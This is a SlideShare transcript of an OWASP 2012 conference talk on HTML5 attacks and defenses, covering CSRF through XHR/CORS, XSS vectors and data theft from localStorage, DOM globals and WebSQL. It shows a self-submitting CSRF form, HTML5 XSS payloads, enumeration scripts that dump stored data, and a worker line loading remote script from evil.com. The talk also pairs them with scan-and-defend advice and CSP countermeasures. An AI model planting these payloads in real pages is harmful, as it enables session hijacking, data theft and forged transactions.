XSS & CSRF with HTML5              Attack, Exploit and Defense                            Shreeraj Shah                   ...
http://shreeraj.blogspot.com                                                              http://shreeraj.blogspot.com    ...
HTML5 VECTORS – ATTACKSURFACE                         OWASP              3
HTML5 – Attacks on the rise …Evolution of HTML5   1991 – HTML started (plain and simple)   1996 – CSS & JavaScript (Welc...
Modern Browser Model                                                                                       Mobile        H...
HTML5 Architecture & Threat Model                                   User Interface                                        ...
CSRF WITH HTML5                  OWASP             7
CSRF Attack Vector                                            ge                    Attacker’s                            ...
SOP bypass and Cookie Replay – Basic Type      GET Request       IMG SRC      <img src="http://host/?command">      SCRIPT...
Streams – name/value pairs are gone …                                        JSON                  XML                    ...
CSRF injection – splitting and forcing …<html><body><FORM NAME="buy" ENCTYPE="text/plain"action="http://trade.example.com/...
CSRF with XHR and CORS bypass                                                                                     Mobile  ...
XHR – Level 2 powering CSRFXHR object of HTML5 is very powerful   Allows interesting features like cross origin request ...
CORS & XHR – ingredients for CSRFBefore HTML5 – Cross Domain was not possible through XHR (SOP applicable)HTML5 – allows...
CORS based HTTP HeadersRequest  Origin  Access-Control-Request-Method (preflight)  Access-Control-Request-Headers (prefli...
XHR – Stealth POST/GETCSRF – powered by CORS and XHR  Hence, allow stealth channel and possible silent   exploitation  ...
Exploiting the use caseCORS preflight bypass – certain Content-Type bypass preflight HTTPForcing cookie replay by “withC...
CSRF with XHR/HTML5                                                                   Authentication                      ...
CSRF with XHR/HTML5                  Browser using                    XHR Call                                            ...
CSRF with XHR/HTML5                                            ge               Attacker’s                                ...
CSRF & HTML5                    OWASP               21
CSRF with XHR/HTML5                                            ge                      Attacker’s                         ...
CSRF & HTML5                    OWASP               23
CSRF with XHR/HTML5                   Browser is                  having Form                   (multi-part)              ...
CSRF/Upload - POC                         OWASP                    25
CSRF with XHR/HTML5                                            ge                      Attacker’s                         ...
CSRF/Upload                   OWASP              27
Internal Scan – not scan but crawl as well …                                                      Attacker’s              ...
Internal Scan for CORS                              OWASP                         29
Scan and DefendScan and look for  Content-Type checking on server side  CORS policy scan  Form and Upload with tokens ...
XSS WITH HTML5                  OWASP             31
XSS with HTML5 (tags, attributes and events)                                                                              ...
HTML5 – Tags/Attributes/EventsTags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form cont...
XSS variantsMedia tagsExamples   <video><source onerror="javascript:alert(1)“>   <video onerror="javascript:alert(1)">...
XSS variantsExploiting autofocus  <input autofocus onfocus=alert(1)>  <select autofocus onfocus=alert(1)>  <textarea a...
XSS variantsForm & Button etc.   <form id="test" /><button form="test"    formaction="javascript:alert(1)">test   <form...
Scan and DefendScan and look for  Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures  Have i...
CSP in Action – HTML5 defense …Content Security Policy – Defending browser against possible post attack scenarios   Base...
Blocking ScriptsContent-Security-Policy: script-src self‘   Only allowing script from the selfOther mechanism   unsafe...
Controlling Browserconnect-src – Controlling WebSocket, XHR etc.frame-src – Source of the frame (ClickJacking)object-sr...
Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: A...
Storage extraction with XSS                                                                                     Mobile    ...
Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (L...
Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no useg...
Blind storage enumerationif(localStorage.length){          console.log(localStorage.length)          for(i in localStorage...
File System StorageHTML5 provides virtual file system with filesystem APIs   window.requestFileSystem = window.requestFi...
File System StorageIt provides temporary or permanent file system   function init() {       window.requestFileSystem(wind...
Sensitive information filesystemAssuming app is creating profile on local system                                         ...
Extraction through XSSOnce have an entry point – game over!                                         OWASP                ...
Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while load...
Blind Enumerationfor(i in window){  obj=window[i];   try{        if(typeof(obj)=="string"){           console.log(i);     ...
Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, obj...
Global Sensitive Information Extraction from DOMfor(i in window){  obj=window[i];  if(obj!=null||obj!=undefined)      var ...
Scan and DefendScan and look for  Scanning storageDefense and Countermeasures  Do not store sensitive information on l...
SQLi & Blind Enumeration through XSS                                                                                     M...
SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data...
SQL InjectionThrough JavaScript one can harvest entire local database.Example                                           ...
Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){            obj = window[i];            try{     ...
Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Selec...
Blind WebSQL Enumeration                           OWASP                      60
Web Messaging and Worker Injection                                                                                     Mob...
Web Messaging HTML5 is having new interframe communication system  called Web Messaging. By postMessage() call parent fr...
Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, ...
Origin check                    OWASP               64
Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like set...
Web Worker – Hacks!                                                  Web Page                                             ...
Web Worker – Hacks!Security issues  It is not allowing to load cross domain worker scripts.   (http:, https:,javascript:...
Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button...
Web Workers – Hacks!Possible to cause XSS   Running script   Passing hidden payloadAlso, web workers can help in embed...
Scan and DefendScan and look for  JavaScript scanning  Messaging and Worker implementation  DOM calls  Use of eval(),...
APIs …HTML5 few other APIs are interesting from security standpoint   File APIs – allows local file access and can mixed...
Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_She...
http://shreeraj.blogspot.com                  http://shreeraj.blogspot.com                   shreeraj@blueinfy.com        ...
Upcoming SlideShare
Loading in...5
×

XSS and CSRF with HTML5

15,659

Published on

Published in: Technology
3 Comments
20 Likes
Statistics
Notes
No Downloads
Views
Total Views
15,659
On Slideshare
0
From Embeds
0
Number of Embeds
55
Actions
Shares
0
Downloads
0
Comments
3
Likes
20
Embeds 0
No embeds

No notes for slide

Transcript of "XSS and CSRF with HTML5"

  1. 1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.netOWASPOWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  2. 2. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd. Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest  Web security research Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
  3. 3. HTML5 VECTORS – ATTACKSURFACE OWASP 3
  4. 4. HTML5 – Attacks on the rise …Evolution of HTML5 1991 – HTML started (plain and simple) 1996 – CSS & JavaScript (Welcome to world of XSS and browser security) 2000 – XHTML1 (Growing concerns and attacks on browsers) 2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion) 2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
  5. 5. Modern Browser Model Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
  6. 6. HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSSSingle JavaScript InternetDOM/PageApplication XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
  7. 7. CSRF WITH HTML5 OWASP 7
  8. 8. CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
  9. 9. SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
  10. 10. Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
  11. 11. CSRF injection – splitting and forcing …<html><body><FORM NAME="buy" ENCTYPE="text/plain"action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name=<?xml version value="1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>></FORM><script>document.buy.submit();</script></body></html> OWASP 11
  12. 12. CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
  13. 13. XHR – Level 2 powering CSRFXHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/downloadxhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
  14. 14. CORS & XHR – ingredients for CSRFBefore HTML5 – Cross Domain was not possible through XHR (SOP applicable)HTML5 – allows cross origin calls with XHR-Level 2 callsCORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls)Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
  15. 15. CORS based HTTP HeadersRequest Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight)Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
  16. 16. XHR – Stealth POST/GETCSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
  17. 17. Exploiting the use caseCORS preflight bypass – certain Content-Type bypass preflight HTTPForcing cookie replay by “withCredentials”Internal network scanning and tunnelingInformation harvesting (internal crawling)Stealth browser shell – post XSS (Allow origin- *)Business functionality abuse (upload and binary streams) OWASP 17
  18. 18. CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
  19. 19. CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
  20. 20. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
  21. 21. CSRF & HTML5 OWASP 21
  22. 22. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
  23. 23. CSRF & HTML5 OWASP 23
  24. 24. CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
  25. 25. CSRF/Upload - POC OWASP 25
  26. 26. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
  27. 27. CSRF/Upload OWASP 27
  28. 28. Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
  29. 29. Internal Scan for CORS OWASP 29
  30. 30. Scan and DefendScan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or notDefense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
  31. 31. XSS WITH HTML5 OWASP 31
  32. 32. XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
  33. 33. HTML5 – Tags/Attributes/EventsTags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)Attributes – form, submit, autofocus, sandbox, manifest, rel etc.Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
  34. 34. XSS variantsMedia tagsExamples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
  35. 35. XSS variantsExploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
  36. 36. XSS variantsForm & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">testEtc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
  37. 37. Scan and DefendScan and look for Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
  38. 38. CSP in Action – HTML5 defense …Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
  39. 39. Blocking ScriptsContent-Security-Policy: script-src self‘ Only allowing script from the selfOther mechanism unsafe-inline - blocking inline unsafe-eval‘ – blocking eval type callsPost XSS defense can be crafted OWASP 39
  40. 40. Controlling Browserconnect-src – Controlling WebSocket, XHR etc.frame-src – Source of the frame (ClickJacking)object-src – Flash, Silverlight etc.media-src – controlling audio and videoimg/style – image and style sourcesdefault-src https:; - locking over SSL only OWASP 40
  41. 41. Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETX-WebKit-CSP: script-src selfX-AspNet-Version: 2.0.50727Cache-Control: privateContent-Type: text/html; charset=utf-8Content-Length: 6146 OWASP 41
  42. 42. Storage extraction with XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
  43. 43. Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (Local and Session)Can hold global scoped variableshttp://www.w3.org/TR/webstorage/ OWASP 43
  44. 44. Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no usegetItem and setItem callsXSS the box and scan through storage OWASP 44
  45. 45. Blind storage enumerationif(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); }}Above code allows all storage variable extraction OWASP 45
  46. 46. File System StorageHTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;It becomes a full blown local system for application in sandboxIt empowers application OWASP 46
  47. 47. File System StorageIt provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } App can have full filesystem in place now. OWASP 47
  48. 48. Sensitive information filesystemAssuming app is creating profile on local system OWASP 48
  49. 49. Extraction through XSSOnce have an entry point – game over! OWASP 49
  50. 50. Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while loading – GLOBALSIt has sensitive information and what if they are GLOBAL and remains during the life of applicationIt can be retrieved with XSSHTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
  51. 51. Blind Enumerationfor(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){}} OWASP 51
  52. 52. Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, objects and array var arrayGlobals = [my@email.com,"12141hewvsdr9321343423mjfdvint","t est.com"];Post DOM based exploitation possible and harvesting all these values. OWASP 52
  53. 53. Global Sensitive Information Extraction from DOMfor(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} }} OWASP 53
  54. 54. Scan and DefendScan and look for Scanning storageDefense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
  55. 55. SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
  56. 56. SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data loading and offline browsing capabilities.Causes security concern and potential injection points.Methods and calls are possible OWASP 56
  57. 57. SQL InjectionThrough JavaScript one can harvest entire local database.Example OWASP 57
  58. 58. Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql(SELECT name FROM sqlite_master WHERE type=table, [],function(tx,results){ table=results; },null); }); } }catch(ex){}}if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
  59. 59. Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Select query directly to sqlite_master databaseWe will grab 1st table leaving webkit table on 0th entry OWASP 59
  60. 60. Blind WebSQL Enumeration OWASP 60
  61. 61. Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
  62. 62. Web Messaging HTML5 is having new interframe communication system called Web Messaging. By postMessage() call parent frame/domain can call with the iframe Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible worker.webkitPostMessage – faster transferable objects OWASP 62
  63. 63. Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, origin is not set to fixed then again frame listen from any domian – again an issueStream coming needs to be checked before innerHTML or eval()Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
  64. 64. Origin check OWASP 64
  65. 65. Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlersTotally Async and well supported [initialize] var worker = new Worker(task.js); [Messaging] worker.postMessage(); OWASP 65
  66. 66. Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
  67. 67. Web Worker – Hacks!Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
  68. 68. Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button><output id="result"></output><script> function Read() { worker.postMessage({cmd: read, msg: last}); } function stop() { worker.postMessage({cmd: stop, msg: stop it}); alert("Worker stopped"); } var worker = new Worker(message.js); worker.addEventListener(message, function(e) { document.getElementById(result).innerHTML = e.data; }, false);</script></html> OWASP 68
  69. 69. Web Workers – Hacks!Possible to cause XSS Running script Passing hidden payloadAlso, web workers can help in embedding silent running js file and can be controlled.Can be a tool for payload delivery and control within browser frameworkimportScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
  70. 70. Scan and DefendScan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc.Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
  71. 71. APIs …HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
  72. 72. Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff)http://html5sec.org/ (Quick Cheat sheet)http://html5security.org/ (Good resources)http://blog.kotowicz.net/ (Interesting work) OWASP 72
  73. 73. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.comCONCLUSION AND QUESTIONS OWASP 73

×